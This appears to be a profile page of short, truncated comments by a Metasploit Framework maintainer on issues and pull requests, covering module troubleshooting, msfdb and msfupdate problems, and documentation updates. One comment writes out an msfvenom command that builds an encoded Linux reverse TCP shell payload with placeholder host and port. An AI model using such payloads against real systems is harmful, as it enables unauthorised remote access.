Grant Willcox

Results 252 comments of Grant Willcox
trafficstars

Hmm `check` isn't working against a default of 6.0.7 since to log in using those credentials you need to be using `ADAudit Plus Authentication` and we default to using the...

Logging in I'm prompted to configure ADAudit GPOs for the domain. Clicking on this it says "Successfully configured audit policies" after a few seconds of it running. I'm still not...

Not seeing any issues on this on my Ubuntu install, is this still occurring with latest release? ``` ~/git/metasploit-framework │master *1 ?16> ./msfdb reinit [?] Would you like to reinit...

Huh thats odd, so just downloaded a fresh install of Kali Linux Weekly rollout and tried replicating this, but was unable to: ``` ┌──(kali㉿kali)-[~] └─$ msfupdate msfupdate is no longer...

@shellchocolat Were you able to get this to work using the command `msfvenom -p linux/x64/shell/reverse_tcp -a x64 --platform linux -e x64/zutto_dekiru -f elf -o t.bin LHOST=xxx.xxx.xxx.xxx LPORT=xxxx`?

No response or additional info given so closing out this issue due to lack of sufficient information to reproduce things.

From executing https://sourcegraph.com/search?q=context:%40tekwizz123/Metasploit-Framework+report_auth_info&patternType=standard&sm=1 it looks like there are also some documentation files that need updating: - [ ] docs/metasploit-framework.wiki/How-to-do-reporting-or-store-data-in-module-development.md - [ ] docs/metasploit-framework.wiki/Guidelines-for-Accepting-Modules-and-Enhancements.md - [ ] documentation/modules/auxiliary/scanner/rservices/rsh_login.md The fact that...

@3V3RYONE Any update on addressing the comments on this PR? We'd like to try get this in before the next GSOC starts and are here on hand to provide advice...

Going to attic this so long as this needs more work to get to the point where we can land this and I haven't seen any significant updates on this...

Assigning this to myself to investigate, will see if we can reproduce this on our end.